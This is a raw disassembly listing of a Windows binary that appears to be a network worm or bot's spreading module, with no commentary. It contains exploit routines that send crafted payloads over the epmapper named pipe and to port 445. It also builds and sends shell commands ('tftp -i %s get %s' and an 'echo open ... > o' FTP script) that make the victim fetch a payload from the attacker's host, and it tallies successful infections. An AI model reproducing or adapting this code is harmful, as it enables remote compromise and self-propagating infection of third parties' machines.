loc_402AC5: ; CODE XREF: sub_4029E9+D1�j
; sub_4029E9+D5�j
xor eax, eax
loc_402AC7: ; CODE XREF: sub_4029E9+DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_4029E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402ACC proc near ; CODE XREF: sub_402DD7+7A�p
; sub_402DD7+15A�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset off_427B6C
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_427B64 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, ds:byte_436EDC
pop ecx
mov [ebp+var_124], al
xor eax, eax
lea edi, [ebp+var_123]
push 0FFh
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
xor esi, esi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push esi
call ds:dword_424070 ;; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B5F
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B5F
add esp, 10h
loc_402B5D: ; CODE XREF: sub_402ACC+AF�j
push esi
lea eax, [ebp+var_354]
push esi
push eax
call ds:dword_43ACD8
test eax, eax
jz short loc_402B7D
push 7D0h
call ds:dword_424064 ;; Sleep
jmp short loc_402B5D
; ---------------------------------------------------------------------------
loc_402B7D: ; CODE XREF: sub_402ACC+A2�j
push 1
pop eax
pop edi
pop esi
leave
retn
sub_402ACC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B84 proc near ; CODE XREF: sub_402DD7+A9�p
; sub_402DD7+1E7�p
var_3004 = byte ptr -3004h
var_2004 = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
var_1FD4 = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3004h
call sub_417B30
push esi
push edi
push offset byte_42F674
mov esi, 0A7h
push [ebp+arg_0]
mov [ebp+var_4], esi
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_3004]
push 1000h
push eax
call sub_416BCD
mov edi, eax
add esp, 10h
test edi, edi
jz loc_402DD3
push ebx
mov ebx, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push 30h
lea eax, [ebp+var_2004]
push ebx
push eax
call sub_417390
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_417330
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+var_1F2D]
push eax
call sub_417390
add esp, 24h
lea esi, [edi+0D7h]
loc_402C09: ; CODE XREF: sub_402B84+D3�j
mov eax, esi
push 10h
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jz short loc_402C59
mov esi, [ebp+var_4]
push 30h
lea eax, [ebp+var_2004]
inc esi
push ebx
push eax
mov [ebp+var_4], esi
call sub_417390
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_417330
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+esi+var_1FD4]
push eax
call sub_417390
add esp, 24h
lea esi, [esi+edi+30h]
jmp short loc_402C09
; ---------------------------------------------------------------------------
loc_402C59: ; CODE XREF: sub_402B84+90�j
cmp [ebp+arg_C4], 0
jz short loc_402C74
cmp [ebp+arg_C0], 3
jz short loc_402C7D
cmp [ebp+arg_C0], 0
jmp short loc_402C7B
; ---------------------------------------------------------------------------
loc_402C74: ; CODE XREF: sub_402B84+DC�j
cmp [ebp+arg_C0], 3
loc_402C7B: ; CODE XREF: sub_402B84+EE�j
jnz short loc_402C86
loc_402C7D: ; CODE XREF: sub_402B84+E5�j
push 4
push offset dword_427B60
jmp short loc_402C8D
; ---------------------------------------------------------------------------
loc_402C86: ; CODE XREF: sub_402B84:loc_402C7B�j
push 4
push offset dword_427B5C
loc_402C8D: ; CODE XREF: sub_402B84+100�j
lea eax, [ebp+var_1FE0]
push eax
call sub_417390
add esp, 0Ch
lea eax, [ebp+var_1004]
push 360h
push offset dword_427694
push eax
call sub_417390
push 10h
lea eax, [ebp+var_CA4]
push offset dword_4279F8
push eax
call sub_417390
lea eax, [ebp+var_2004]
push esi
push eax
lea eax, [ebp+var_C94]
push eax
call sub_417390
lea edi, [esi+370h]
push 3Ch
push offset off_427A0C
lea eax, [ebp+edi+var_1004]
push eax
call sub_417390
add edi, 3Ch
push 30h
push offset dword_427A4C
lea eax, [ebp+edi+var_1004]
push eax
call sub_417390
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi
mov [ebp+var_E78], eax
call sub_417B89
add esp, 40h
mov ebx, eax
push esi
push 0
push ebx
call sub_417330
lea eax, [ebp+var_1004]
push edi
push eax
push ebx
call sub_417390
mov eax, [ebp+arg_BC]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_402DD3: ; CODE XREF: sub_402B84+3E�j
pop edi
pop esi
leave
retn
sub_402B84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DD7 proc near ; CODE XREF: sub_407767+1EA�p
; DATA XREF: _2:off_42ACB4�o
var_1338 = byte ptr -1338h
var_338 = byte ptr -338h
var_138 = byte ptr -138h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
mov eax, 1338h
call sub_417B30
cmp [ebp+arg_A0], 1BDh
push ebx
push esi
push edi
jnz loc_402F45
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+arg_4]
push eax
call sub_4029E9
pop ecx
test eax, eax
pop ecx
jz loc_403055
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_138]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call sub_4172B0
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp+var_138]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
call ds:off_424084
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_402E5C
loc_402E4D: ; CODE XREF: sub_402DD7+126�j
lea eax, [ebp+arg_4]
push eax
call sub_402ACC
pop ecx
jmp loc_403055
; ---------------------------------------------------------------------------
loc_402E5C: ; CODE XREF: sub_402DD7+74�j
lea eax, [ebp+arg_4]
push 2
push eax
call sub_40D4C5
pop ecx
lea esi, [ebp+arg_0]
pop ecx
push 1
push eax
lea eax, [ebp+var_10]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_402B84
add esp, 0C8h
cmp eax, ebx
mov [ebp+var_8], eax
jz short loc_402EF4
mov edi, 186A0h
push edi
call sub_417B89
mov esi, eax
push edi
push ebx
push esi
call sub_417330
add esp, 10h
lea eax, [ebp+var_C]
mov edi, 2710h
push ebx
push eax
push edi
push esi
push 48h
push offset dword_427648
push [ebp+var_4]
call ds:dword_424080 ;; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_402EE4
lea eax, [ebp+var_14]
push ebx
push eax
push [ebp+var_10]
push [ebp+var_8]
push [ebp+var_4]
call ds:dword_42407C ;; WriteFile
test eax, eax
jnz short loc_402F02
loc_402EE4: ; CODE XREF: sub_402DD7+F3�j
push esi
call sub_417C3B
push [ebp+var_8]
call sub_417C3B
pop ecx
pop ecx
loc_402EF4: ; CODE XREF: sub_402DD7+B9�j
push [ebp+var_4]
call ds:off_424078
jmp loc_402E4D
; ---------------------------------------------------------------------------
loc_402F02: ; CODE XREF: sub_402DD7+10B�j
lea eax, [ebp+var_C]
push ebx
push eax
push edi
push esi
push [ebp+var_4]
call ds:off_424074
push [ebp+var_8]
mov edi, eax
call sub_417C3B
push esi
call sub_417C3B
pop ecx
pop ecx
push [ebp+var_4]
call ds:off_424078
lea eax, [ebp+arg_4]
push eax
call sub_402ACC
cmp edi, 1
pop ecx
jnz loc_403066
jmp loc_403055
; ---------------------------------------------------------------------------
loc_402F45: ; CODE XREF: sub_402DD7+1A�j
lea eax, [ebp+arg_4]
push 1
push eax
call sub_40D4C5
mov esi, eax
pop ecx
cmp esi, 1
pop ecx
jz loc_403055
xor ebx, ebx
push ebx
push 1
push 2
call ds:dword_43AE18 ;; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_403055
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+arg_A0]
call ds:dword_43AD98 ;; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call ds:dword_43ADD8 ;; inet_addr
mov [ebp+var_20], eax
push ebx
lea eax, [ebp+var_C]
push esi
push eax
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_402B84
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_402FD7
push [ebp+var_4]
jmp short loc_40304F
; ---------------------------------------------------------------------------
loc_402FD7: ; CODE XREF: sub_402DD7+1F9�j
mov edi, [ebp+var_4]
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call ds:dword_43AD40 ;; connect
cmp eax, 0FFFFFFFFh
jnz short loc_402FEF
loc_402FEC: ; CODE XREF: sub_402DD7+22A�j
push esi
jmp short loc_403048
; ---------------------------------------------------------------------------
loc_402FEF: ; CODE XREF: sub_402DD7+213�j
push ebx
push 48h
push offset dword_427648
push edi
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz short loc_402FEC
mov esi, 1000h
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call ds:dword_43ADB0 ;; recv
push ebx
push [ebp+var_C]
push [ebp+var_8]
push edi
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jnz short loc_403030
push [ebp+var_8]
jmp short loc_403048
; ---------------------------------------------------------------------------
loc_403030: ; CODE XREF: sub_402DD7+252�j
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call ds:dword_43ADB0 ;; recv
push [ebp+var_8]
cmp eax, 0FFFFFFFFh
jnz short loc_403059
loc_403048: ; CODE XREF: sub_402DD7+216�j
; sub_402DD7+257�j
call sub_417C3B
pop ecx
push edi
loc_40304F: ; CODE XREF: sub_402DD7+1FE�j
call ds:dword_43AE30 ;; closesocket
loc_403055: ; CODE XREF: sub_402DD7+31�j
; sub_402DD7+80�j ...
xor eax, eax
jmp short loc_4030C7
; ---------------------------------------------------------------------------
loc_403059: ; CODE XREF: sub_402DD7+26F�j
call sub_417C3B
pop ecx
push edi
call ds:dword_43AE30 ;; closesocket
loc_403066: ; CODE XREF: sub_402DD7+163�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_338]
push offset unk_427B78
push eax
call sub_4172B0
add esp, 0Ch
loc_40307E: ; CODE XREF: sub_402DD7+2C7�j
lea eax, [ebp+var_338]
push eax
call sub_40C04D
test eax, eax
pop ecx
jnz short loc_4030A2
push 1388h
call ds:dword_424064 ;; Sleep
inc ebx
cmp ebx, 6
jl short loc_40307E
jmp short loc_4030C4
; ---------------------------------------------------------------------------
loc_4030A2: ; CODE XREF: sub_402DD7+2B6�j
lea eax, [ebp+var_338]
push eax
call sub_40BF6D
mov eax, [ebp+arg_A8]
pop ecx
imul eax, 3Ch
inc ds:dword_42ACB8[eax]
lea eax, dword_42ACB8[eax]
loc_4030C4: ; CODE XREF: sub_402DD7+2C9�j
push 1
pop eax
loc_4030C7: ; CODE XREF: sub_402DD7+280�j
pop edi
pop esi
pop ebx
leave
retn
sub_402DD7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4030CC proc near ; DATA XREF: _2:00426004�o
jmp $+5
sub_4030CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4030D1 proc near
push 0BB80h
push 76Ch
call sub_415450
pop ecx
mov ds:dword_436EE0, eax
pop ecx
retn
sub_4030D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030E8 proc near ; CODE XREF: sub_403249+42A�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_43ADD8 ;; inet_addr
mov [ebp+var_C], eax
mov ax, word ptr ds:dword_436EE0
push eax
call ds:dword_43AD98 ;; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_43AE18 ;; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_403222
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_43AD40 ;; connect
cmp eax, 0FFFFFFFFh
jz loc_403222
push esi
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call ds:dword_43ADB0 ;; recv
mov esi, offset byte_42F674
push esi
push esi
push [ebp+arg_0]
call sub_40AEE0
pop ecx
mov edi, 190h
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41782A
add esp, 18h
push esi
push esi
push ds:dword_436F0C
push [ebp+arg_0]
call sub_40AEE0
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41782A
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz short loc_403222
push 1F4h
call ds:dword_424064 ;; Sleep
push esi
push offset dword_428598
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jnz short loc_403226
loc_403222: ; CODE XREF: sub_4030E8+51�j
; sub_4030E8+67�j ...
xor al, al
jmp short loc_403244
; ---------------------------------------------------------------------------
loc_403226: ; CODE XREF: sub_4030E8+138�j
push 0
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call ds:dword_43ADB0 ;; recv
push ebx
call ds:dword_43AE30 ;; closesocket
mov al, 1
loc_403244: ; CODE XREF: sub_4030E8+13C�j
pop edi
pop esi
pop ebx
leave
retn
sub_4030E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403249 proc near ; CODE XREF: _0:004037AD�p _0:004037CF�p
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call sub_417B30
mov eax, ds:dword_428634
push ebx
mov [ebp+var_10], eax
mov eax, ds:dword_428638
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_3C]
push offset loc_428628
push eax
call sub_4172B0
add esp, 0Ch
xor ebx, ebx
xor esi, esi
lea eax, [ebp+var_103]
loc_403288: ; CODE XREF: sub_403249+4E�j
mov cl, [ebp+esi+var_3C]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, 28h
jl short loc_403288
push 60h
lea eax, [ebp+var_B4]
push offset dword_4280B8
push eax
call sub_417390
lea eax, [ebp+var_3C]
push eax
call sub_417AB0
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_417390
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC_0+3)
push eax
call sub_417AB0
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_417390
lea eax, [ebp+var_3C]
push eax
call sub_417AB0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_417390
lea eax, [ebp+var_3C]
push eax
call sub_417AB0
shl al, 1
add al, 9
push 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_87]
push eax
call sub_417390
mov ax, word ptr ds:dword_436EE0
add esp, 2Ch
push eax
call ds:dword_43AD98 ;; htons
xor eax, 9999h
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_427DB8
call sub_417390
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_403445
mov edi, 0DACh
lea eax, [ebp+var_1CC4]
push edi
push 90h
push eax
call sub_417330
mov eax, [ebp+arg_C0]
push 4
imul eax, 3Ch
lea eax, dword_4284E0[eax]
mov [ebp+var_14], eax
push eax
lea eax, [ebp+var_14E0]
push eax
call sub_417390
mov esi, offset loc_427D08
push esi
call sub_417AB0
push eax
lea eax, [ebp+var_14D0]
push esi
push eax
call sub_417390
push 4
lea eax, [ebp+var_11AC]
push offset loc_428620
push eax
call sub_417390
push 4
lea eax, [ebp+var_11A8]
push [ebp+var_14]
push eax
call sub_417390
add esp, 40h
push esi
call sub_417AB0
push eax
lea eax, [ebp+var_119C]
push esi
push eax
call sub_417390
add esp, 10h
xor esi, esi
lea eax, [ebp+var_4803]
loc_4033FE: ; CODE XREF: sub_403249+1C6�j
mov cl, [ebp+esi+var_1CC4]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, edi
jl short loc_4033FE
mov esi, 1C52h
lea eax, [ebp+var_89B4]
push esi
push 31h
push eax
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call sub_417330
push esi
lea eax, [ebp+var_68DC]
push 31h
push eax
call sub_417330
add esp, 18h
jmp short loc_40349C
; ---------------------------------------------------------------------------
loc_403445: ; CODE XREF: sub_403249+118�j
push 7D0h
lea eax, [ebp+var_F14]
push 90h
push eax
call sub_417330
mov esi, offset loc_427D08
push esi
call sub_417AB0
push eax
lea eax, [ebp+var_E74]
push esi
push eax
call sub_417390
lea eax, [ebp+var_10]
push eax
call sub_417AB0
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_758]
push eax
call sub_417390
mov eax, ds:dword_4284E0
add esp, 2Ch
mov [ebp+var_768], eax
loc_40349C: ; CODE XREF: sub_403249+1FA�j
push 0E29h
lea eax, [ebp+var_2CA8]
push 31h
push eax
call sub_417330
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
add eax, 4
push ebx
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jnz short loc_4034DB
loc_4034D4: ; CODE XREF: sub_403249+2B9�j
; sub_403249+2E0�j ...
xor al, al
jmp loc_403683
; ---------------------------------------------------------------------------
loc_4034DB: ; CODE XREF: sub_403249+289�j
mov esi, 640h
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call ds:dword_43ADB0 ;; recv
push ebx
push 68h
push offset dword_42811C
push edi
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz short loc_4034D4
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call ds:dword_43ADB0 ;; recv
push ebx
push 0A0h
push offset dword_428188
push edi
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz short loc_4034D4
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call ds:dword_43ADB0 ;; recv
cmp [ebp+arg_C0], ebx
jz loc_4035F1
push 68h
lea eax, [ebp+var_89B4]
push offset dword_428340
push eax
call sub_417390
lea eax, [ebp+var_4804]
push 1B5Ah
push eax
lea eax, [ebp+var_894C]
push eax
call sub_417390
push 70h
lea eax, [ebp+var_68DC]
push offset dword_4283AC
push eax
call sub_417390
lea eax, [ebp+var_3770]
push 0A5Eh
push eax
lea eax, [ebp+var_686C]
push eax
call sub_417390
push 84h
lea eax, [ebp+var_5DA8]
push offset dword_428420
push eax
call sub_417390
add esp, 3Ch
lea eax, [ebp+var_89B4]
push ebx
push 10FCh
push eax
push edi
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz loc_4034D4
push ebx
lea eax, [ebp+var_744]
push esi
push eax
push edi
call ds:dword_43ADB0 ;; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_403647
; ---------------------------------------------------------------------------
loc_4035F1: ; CODE XREF: sub_403249+2F8�j
push 7Ch
lea eax, [ebp+var_2CA8]
push offset dword_42822C
push eax
call sub_417390
lea eax, [ebp+var_F14]
push 7D0h
push eax
lea eax, [ebp+var_2C2C]
push eax
call sub_417390
push 90h
lea eax, [ebp+var_245C]
push offset off_4282AC
push eax
call sub_417390
add esp, 24h
mov [ebp+var_1FB1], bl
lea eax, [ebp+var_2CA8]
push ebx
push 0CF8h
loc_403647: ; CODE XREF: sub_403249+3A6�j
push eax
push edi
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz loc_4034D4
push 12Ch
call ds:dword_424064 ;; Sleep
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4030E8
add esp, 0BCh
test al, al
setnz al
loc_403683: ; CODE XREF: sub_403249+28D�j
pop edi
pop esi
pop ebx
leave
retn
sub_403249 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
push 0BB80h
push 76Ch
call sub_415450
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call sub_417330
add esp, 14h
lea eax, [ebp+0Ch]
mov word ptr [ebp-14h], 2
push eax
call ds:dword_43ADD8 ;; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call ds:dword_43AD98 ;; htons
push 6
push 1
push 2
mov [ebp-12h], ax
call ds:dword_43AE18 ;; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_403790
lea eax, [ebp-14h]
push 10h
push eax
push ebx
call ds:dword_43AD40 ;; connect
cmp eax, 0FFFFFFFFh
jz loc_403790
push edi
push 89h
push offset dword_427EA0
push ebx
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz short loc_403790
mov esi, 640h
push edi
lea eax, [ebp-654h]
push esi
push eax
push ebx
call ds:dword_43ADB0 ;; recv
push edi
push 0A8h
push offset dword_427F2C
push ebx
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz short loc_403790
push edi
lea eax, [ebp-654h]
push esi
push eax
push ebx
call ds:dword_43ADB0 ;; recv
push edi
push 0DEh
push offset dword_427FD8
push ebx
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz short loc_403790
push edi
lea eax, [ebp-654h]
push esi
push eax
push ebx
call ds:dword_43ADB0 ;; recv
movsx eax, byte ptr [ebp-610h]
sub eax, 30h
jz short loc_40379A
dec eax
jz short loc_403797
loc_403790: ; CODE XREF: _0:004036EB�j _0:00403701�j ...
xor eax, eax
jmp loc_403817
; ---------------------------------------------------------------------------
loc_403797: ; CODE XREF: _0:0040378E�j
push edi
jmp short loc_4037BE
; ---------------------------------------------------------------------------
loc_40379A: ; CODE XREF: _0:0040378B�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+8]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403249
add esp, 0C4h
test al, al
jnz short loc_4037DE
push 1
loc_4037BE: ; CODE XREF: _0:00403798�j
push ebx
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_403249
add esp, 0C4h
test al, al
jz short loc_4037E5
loc_4037DE: ; CODE XREF: _0:004037BA�j
mov dword ptr [ebp-4], 1
loc_4037E5: ; CODE XREF: _0:004037DC�j
push ebx
call ds:dword_43AE30 ;; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_403814
lea eax, [ebp-854h]
push eax
call sub_40BF6D
mov eax, [ebp+0B0h]
pop ecx
imul eax, 3Ch
inc ds:dword_42ACB8[eax]
lea eax, dword_42ACB8[eax]
loc_403814: ; CODE XREF: _0:004037F0�j
push 1
pop eax
loc_403817: ; CODE XREF: _0:00403792�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40381C proc near ; CODE XREF: sub_403A90+E�p
; sub_403A90+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_40381C endp
; =============== S U B R O U T I N E =======================================
sub_403826 proc near ; CODE XREF: sub_403A90+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
mov esi, ecx
push ebx
call sub_417B89
mov edi, eax
pop ecx
test edi, edi
jz short loc_403858
push ebx
push 0
push edi
call sub_417330
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_417390
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_403858: ; CODE XREF: sub_403826+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_403826 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403860 proc near ; CODE XREF: sub_40395A+18�p
; sub_4039D4+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi
call sub_417B89
mov esi, eax
pop ecx
test esi, esi
jz short loc_4038AC
push edi
push 0
push esi
call sub_417330
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_417390
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_417390
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_4038AC: ; CODE XREF: sub_403860+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_403860 endp
; =============== S U B R O U T I N E =======================================
sub_4038B5 proc near ; CODE XREF: sub_40395A+5E�p
; sub_40395A+6F�p ...
push esi
mov esi, ecx
